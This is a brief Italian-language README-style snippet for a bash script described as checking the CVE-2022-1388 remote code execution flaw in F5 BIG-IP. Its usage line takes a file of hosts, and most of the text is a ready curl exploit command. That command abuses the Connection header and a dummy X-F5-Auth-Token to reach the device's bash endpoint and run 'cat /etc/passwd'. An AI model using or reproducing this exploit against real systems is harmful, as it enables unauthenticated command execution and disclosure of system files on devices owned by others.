
Semplice script bash per verificare la RCE CVE-2022-1388 (F5 BIG-IP).
[+] Utilizzo: ./CVE-2022-1388.sh hosts.txt
Non dimenticare di cambiare l'indirizzo IP
curl -X POST http://10.0.0.1/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: anything"